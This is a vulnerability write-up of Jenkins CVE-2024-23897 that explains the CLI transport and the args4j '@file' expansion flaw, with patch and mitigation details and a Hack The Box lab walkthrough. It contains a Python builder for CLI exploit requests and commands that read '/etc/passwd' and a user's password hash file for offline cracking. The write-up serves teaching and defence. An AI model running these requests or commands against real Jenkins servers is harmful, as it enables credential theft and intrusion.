# CVE Explained CVE-2024-23897

***

References

* [Jenkins-Security-Advisory](https://www.jenkins.io/security/advisory/2024-01-24/)
* [CYFIRMA](https://www.cyfirma.com/research/jenkins-cve-2024-23897-vulnerability-analysis-and-exploitation/)
* [TRENDMICRO](https://www.trendmicro.com/en_us/research/24/c/cve-2024-23897.html)

Exploits:

* My python exploit [Here](https://github.com/Anekant-Singhai/Exploits/tree/master/CVE-2024-23897)

***

**Vulnerability Type:** Arbitrary file read through the Jenkins CLI, which can be chained into Remote Code Execution (RCE)\
**CVE ID:** CVE-2024-23897\
**CVSS Severity Score:** 9.8 (Critical)\
**Application:** Jenkins\
**Impact:** Attackers with Overall/Read permission (the anonymous user has it on instances that grant it, so no login is needed there) can read arbitrary files on the Jenkins controller file system. Attackers without Overall/Read can still read the first few lines of a file; how many depends on the CLI command used. Depending on what is readable (credentials, encryption keys, user password hashes), this can be escalated to remote code execution.\
**Severity:** Critical\
**Affected Versions:** Jenkins 2.441 and earlier, LTS 2.426.2 and earlier. See the [advisory](https://www.jenkins.io/security/advisory/2024-01-24/) for the full list.\
**Patch Available:** Yes, in Jenkins 2.442 and LTS 2.426.3.\
**Mitigation:** Upgrade to a fixed release promptly. If an immediate upgrade is not possible, disable access to the CLI as described in the advisory; that is expected to prevent exploitation completely.

***

## The Vulnerability

The vulnerable parser is reached through the Jenkins CLI. The CLI client (`jenkins-cli.jar`) talks to the controller over plain `HTTP` or over a `WebSocket` to the `/cli` endpoint, and both transports hand the same arguments to the same code.

**The flow**

Over HTTP the client makes two separate `POST` requests to `/cli`. Both carry the same randomly generated `Session` UUID, and a `Side` header tells the server which half of the channel each request is.

<figure><img src="/files/Pye5M9s67RJ2eY8EQ7k9" alt=""><figcaption><p>The flow of request</p></figcaption></figure>

**Post Request 1**

The `download` side is opened first and kept open. The server registers the session under its UUID, replies with a single zero byte to confirm the channel is up, and later streams the command's stdout, stderr and exit code back on this response.

**Post Request 2**

The `upload` side carries the command name and its arguments in its body, framed by `PlainCLIProtocol` (see below), followed by a start frame. The server looks the session up by UUID and feeds these frames to the command; an upload whose UUID has no download side is rejected, which is why the order matters.
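The two requests above, modelled in Python as an added example (this is not code from the page, from my exploit or from Jenkins). It builds the download-side and upload-side `POST` requests that the CLI client sends to `/cli?remoting=false`, encodes the upload body as `PlainCLIProtocol` frames, and decodes a download-side reply. Nothing is sent over the network: `SAMPLE_REPLY` is a hand-constructed server response, and the frame layout and opcode order are as I read them from the Jenkins source, so verify them against the version you target.

```python
"""Two-request Jenkins CLI transport, modelled in Python (added example, not Jenkins code)."""
import io
import struct
import uuid

# Opcodes in the order of Jenkins' PlainCLIProtocol.Op enum (ordinal = opcode byte).
OPS = ["ARG", "LOCALE", "ENCODING", "START", "EXIT", "STDIN", "END_STDIN", "STDOUT", "STDERR"]
OP = {name: i for i, name in enumerate(OPS)}


def java_write_utf(text):
    """Mirror DataOutputStream.writeUTF: 2-byte big-endian length, then the bytes."""
    data = text.encode("utf-8")  # modified UTF-8 differs only for NUL and non-BMP chars
    return struct.pack(">H", len(data)) + data


def encode_frame(op, payload=b""):
    """One frame: 4-byte big-endian length of (opcode byte + payload), then that body."""
    body = bytes([OP[op]]) + payload
    return struct.pack(">I", len(body)) + body


def build_upload_body(args, encoding="UTF-8", locale="en_US"):
    """Frames the client writes on the upload side: ARG per argument, ENCODING, LOCALE, START."""
    frames = [encode_frame("ARG", java_write_utf(a)) for a in args]
    frames.append(encode_frame("ENCODING", java_write_utf(encoding)))
    frames.append(encode_frame("LOCALE", java_write_utf(locale)))
    frames.append(encode_frame("START"))
    return b"".join(frames)


def build_requests(base_url, args):
    """Return (download, upload) request descriptions sharing one Session UUID.

    The download request must reach the server first, because it registers the UUID.
    An '@/path' argument is sent literally; the expansion happens on the server.
    """
    session = str(uuid.uuid4())
    url = base_url.rstrip("/") + "/cli?remoting=false"
    download = {"url": url, "headers": {"Session": session, "Side": "download"}, "body": b""}
    upload = {
        "url": url,
        "headers": {"Session": session, "Side": "upload", "Content-Type": "application/octet-stream"},
        "body": build_upload_body(args),
    }
    return download, upload


def parse_download_stream(data):
    """Decode the download side: one zero byte, then frames until EXIT.

    Returns the concatenated stdout and stderr payloads and the exit code
    (None if the stream ended before an EXIT frame).
    """
    stream = io.BytesIO(data)
    if stream.read(1) != b"\x00":
        raise ValueError("expected the initial zero byte from the server")
    result = {"stdout": b"", "stderr": b"", "exit": None}
    while True:
        header = stream.read(4)
        if len(header) < 4:
            break  # truncated stream: return what was decoded so far
        (length,) = struct.unpack(">I", header)
        body = stream.read(length)
        op, payload = OPS[body[0]], body[1:]
        if op == "STDOUT":
            result["stdout"] += payload
        elif op == "STDERR":
            result["stderr"] += payload
        elif op == "EXIT":
            (result["exit"],) = struct.unpack(">i", payload)
            break
    return result


# Constructed reply, shaped like a download-side response: a stderr line, then the exit code.
SAMPLE_REPLY = (
    b"\x00"
    + encode_frame("STDERR", b"ERROR: the first line of the referenced file would be echoed here\n")
    + encode_frame("EXIT", struct.pack(">i", 3))
)


def demo():
    """Build both requests for a command with an '@file' argument and decode the sample reply."""
    download, upload = build_requests("http://10.10.11.10:8080", ["reload-job", "@/etc/passwd"])
    return download, upload, parse_download_stream(SAMPLE_REPLY)


if __name__ == "__main__":
    d, u, reply = demo()
    print(d["headers"], u["headers"])
    print(u["body"].hex())
    print(reply)
```

To turn this into a live client you would issue the download request on one connection, read the zero byte, then send the upload body on a second connection with the same `Session` header and keep reading frames from the first connection until `EXIT`.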

**Why is it happening**

The request passes through the following classes on its way to the vulnerable parser, each one handing the attacker's input a step further:

1. `CliCrumbExclusion`: its `process` method exempts the `/cli` path from Jenkins' CSRF crumb check, which is why the two POST requests need no crumb.

```java
// Jenkins exempts the /cli path from its CSRF crumb check, so the two POST
// requests need no crumb (and therefore no prior authenticated GET).
public class CliCrumbExclusion extends CrumbExclusion {
    @Override
    public boolean process(HttpServletRequest request, HttpServletResponse response, FilterChain chain) throws IOException, ServletException {
        String pathInfo = request.getPathInfo();
        if ("/cli".equals(pathInfo)) {
            // Matching path: skip the crumb check and continue down the filter chain.
            chain.doFilter(request, response);
            return true;
        }
        return false; // any other path still requires a valid crumb
    }
}
```

2. `FullDuplexHttpService`: pairs the two HTTP requests into one bidirectional channel through three methods:
   1. `generateResponse`: reads the `Session` header (the UUID the client generated at random, which the exploit does too) and the `Side` header, and dispatches the request to one of the two methods below. An upload whose UUID has no registered download side is refused.

      <figure><img src="/files/bkRZ2PCuWNFEduCbrupv" alt=""><figcaption><p>Note the Session and Side headers; they are what the exploit reproduces.</p></figcaption></figure>
   2. `download`: registers the session and keeps the response open so the command's output can be streamed back to the client.
   3. `upload`: reads the command frames from the request body and hands them to the CLI.
3. `PlainCLIProtocol`: a class rather than a method; it continuously reads frames from the input stream. Each frame is a 4-byte length followed by a one-byte opcode and the payload, and the reader dispatches on the opcode (`ARG` carries one argument, `START` runs the command, `STDOUT`, `STDERR` and `EXIT` carry the results back).
4. `CLICommand`: the command's `main` method builds a `CmdLineParser` from the `args4j` library and calls `parseArgument` on the collected arguments; that parser contains the vulnerable code.

<figure><img src="/files/lDNQe4dyy0rt1oQ3C8hi" alt=""><figcaption><p>Calling the args4j's method CmdLineParser</p></figcaption></figure>

Looking at `args4j` itself, `parseArgument` calls `expandAtFiles` whenever at-syntax is enabled, which is the default, and `expandAtFiles` is the actual vulnerable code:

<figure><img src="/files/uCYrzVm1ufRatCJSTcgx" alt=""><figcaption><p>Calling the actual vulnerable function</p></figcaption></figure>

This is the function itself:

<figure><img src="/files/3rnle3uOdNzXBGZISE2M" alt=""><figcaption></figcaption></figure>

What it does with the raw argument array:

1. It iterates over every element of the array.
2. If an element starts with the character `'@'`, it is treated as a file reference. It then:
   * strips the leading `'@'` to obtain the file path;
   * checks that the file exists and, if not, throws a `CmdLineException` naming the path;
   * reads every line of the file and appends each line to the `result` list as a separate argument.
3. Any other element is copied to `result` unchanged.

The file is read with the privileges of the Jenkins controller, and whatever the command later does with its arguments (typically echoing the unknown value back in an error message) returns the file's contents, line by line, to the caller.
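A Python model of that expansion and of the fix, as an added example (this is not code from the page, from args4j or from Jenkins). The vulnerable path mirrors `expandAtFiles` as described above; the fixed path mirrors what Jenkins 2.442 and LTS 2.426.3 do, which is to construct the parser with at-syntax disabled so a leading `@` is never treated as a file reference. `reload_job` is a hypothetical stand-in for a multi-valued command that reports unknown names in its error output; the `config.xml` it reads is constructed here and the hash in it is fake.

```python
"""args4j '@file' expansion and the Jenkins fix, modelled in Python (added example)."""
import os
import tempfile


class CmdLineException(Exception):
    """Stands in for org.kohsuke.args4j.CmdLineException."""


def expand_at_files(args, at_syntax=True):
    """Return the argument list after '@file' expansion.

    at_syntax=True mirrors the vulnerable default; at_syntax=False mirrors the fix,
    where every argument is taken literally.
    """
    if not at_syntax:
        return list(args)
    result = []
    for arg in args:
        if arg.startswith("@"):
            path = arg[1:]                       # drop the '@' to get the file path
            if not os.path.exists(path):
                raise CmdLineException(f"No such file: {path}")
            with open(path, encoding="utf-8") as fh:
                result.extend(line.rstrip("\n") for line in fh)  # each line becomes an argument
        else:
            result.append(arg)
    return result


def reload_job(args, known_jobs, at_syntax=True):
    """Hypothetical multi-valued command: every unknown name is echoed back in an error.

    After expansion each line of the referenced file is one 'job name', so the
    error output leaks the whole file to the caller.
    """
    errors = []
    for name in expand_at_files(args, at_syntax):
        if name not in known_jobs:
            errors.append(f"ERROR: No such job '{name}'")
    return errors


# Constructed user config; the hash is a placeholder, not a real jbcrypt value.
CONSTRUCTED_CONFIG = """<?xml version='1.1' encoding='UTF-8'?>
<user>
  <fullName>jennifer</fullName>
  <passwordHash>#jbcrypt:$2a$10$FAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEF</passwordHash>
</user>
"""


def demo():
    """Run the same '@file' argument through the vulnerable and the fixed parser."""
    with tempfile.TemporaryDirectory() as tmp:
        path = os.path.join(tmp, "config.xml")
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(CONSTRUCTED_CONFIG)
        vulnerable = reload_job(["@" + path], {"Builder"})
        fixed = reload_job(["@" + path], {"Builder"}, at_syntax=False)
    return vulnerable, fixed


if __name__ == "__main__":
    vulnerable, fixed = demo()
    print("\n".join(vulnerable))   # one error per line of the file, hash included
    print("\n".join(fixed))        # a single error naming the literal '@/path'
```

With at-syntax on, the five lines of the constructed file come back as five "No such job" errors, the password hash among them; with it off, the only error names the literal `@/path` string, which is exactly the behaviour the patched releases exhibit.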

## How to exploit:

The walkthrough below uses the Hack The Box machine [Builder](https://app.hackthebox.com/machines/Builder).

#### CLI Version

The [Jenkins documentation](https://www.jenkins.io/doc/book/managing/cli/#downloading-the-client) explains that the CLI client, `jenkins-cli.jar`, is served by the Jenkins instance itself, so with Jenkins already running we can download it straight from the target. The same page is why I listed `websocket` and `HTTP` earlier: the client supports both transports.

<figure><img src="/files/PP7a5iXCKAuhibdoiM4m" alt=""><figcaption><p>They also tell us how to </p></figcaption></figure>

```
wget http://10.10.11.10:8080/jnlpJars/jenkins-cli.jar
```

We run the client against the target, and the response comes back as an error message:

<figure><img src="/files/6wxgPRstyCKJDAULZnLv" alt=""><figcaption><p>We also get the response in form of error</p></figcaption></figure>

Looking in Wireshark at what the client did in the background:

<figure><img src="/files/M6eespb1jGnvCBMMIgjW" alt=""><figcaption><p>The packets we sent</p></figcaption></figure>

<figure><img src="/files/tiT8ryGRvIHHliejpRgM" alt=""><figcaption><p>The response we get</p></figcaption></figure>

**Reading Sensitive files**

Now I can read the file that contains the user's password hash:

```
java -jar jenkins-cli.jar -s 'http://10.10.11.10:8080' reload-job '@/var/jenkins_home/users/jennifer_12108429903186576833/config.xml'
```

<figure><img src="/files/vpnjo3Gv834RHR8diLws" alt=""><figcaption></figcaption></figure>

I can then take that hash offline and try to crack it, on the assumption that the password is weak.

I also wrote a Python exploit for this; it can be found [here](https://github.com/Anekant-Singhai/Exploits/tree/master/CVE-2024-23897).

